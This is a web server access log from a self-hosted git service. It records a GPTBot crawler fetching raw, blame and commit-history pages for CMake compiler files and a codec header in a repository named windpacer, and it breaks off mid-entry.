200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15105] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15367] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15367] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15364] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15366] [Gzip 8.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13717] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13714] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13716] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15362] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:54:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13715] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13718] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13714] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13650] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13647] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13653] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9961] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13652] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13651] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13652] [Gzip 7.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" -[17/Feb/2026:15:54:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10193] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:54:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 9950] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13701] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/codec.hpp" -[17/Feb/2026:15:54:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 